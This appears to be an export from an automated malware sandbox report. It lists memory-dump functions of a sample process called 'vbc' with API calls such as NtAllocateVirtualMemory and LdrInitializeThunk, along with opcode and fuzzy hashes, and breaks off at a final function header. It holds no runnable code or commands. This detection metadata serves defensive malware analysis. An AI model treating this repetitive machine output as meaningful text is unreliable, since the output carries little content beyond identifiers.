Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 53d5a4eeab02fea0f899319b816af1ebeb7531070fdd4f966839788e8bcbef93
Instruction ID: f7523287f29d6fe6f2cf7956ba2f0c2abdca80545f7a8a6e2d1ce2ccf1de4634
Opcode Fuzzy Hash: 53d5a4eeab02fea0f899319b816af1ebeb7531070fdd4f966839788e8bcbef93
Instruction Fuzzy Hash: 6BF058B2210208AFDB14DF98CC81EEB77A8EF88358F118549FE1CA7241C234E811CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E7C, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 076a299f7c407e1331a305a4888a038f6a5f5e7c31a648711791beeed5cdc0c0
Instruction ID: 139aa4a7a0a911ada602052342df41cd9bde445464c7247a71f2d17c10fc803e
Opcode Fuzzy Hash: 076a299f7c407e1331a305a4888a038f6a5f5e7c31a648711791beeed5cdc0c0
Instruction Fuzzy Hash: C3E0DF712403007BCA14DBD5CC45E977B6CEF05330F11405AFA095B242C530A54086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A400CF

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00A40078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A40086

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 00A40048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A40053

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3F9FB

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3F90E

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FAF3

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FADB

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FBC3

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FB73

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FC9B

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FC6B

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FD9A

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FDCB

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FEAB

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FEDB

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00A3FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A3FFBF

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00409A80, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00408286, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Strings

(, xrefs: 0040828C

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: (
API String ID: 1836367815-3887548279
Opcode ID: b784bc7f3e88494daba021be060d48e12c8f2a7faf1ca8a68c7348251b259488
Instruction ID: 3bd0e3de3a48e026a73040ff265cd42116660e97523665222c81487ff7b89774
Opcode Fuzzy Hash: b784bc7f3e88494daba021be060d48e12c8f2a7faf1ca8a68c7348251b259488
Instruction Fuzzy Hash: A201FE31A403187BE720A6A58C42FFE771CAF40F04F04401DFE44BA1C1D6F9691A47EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
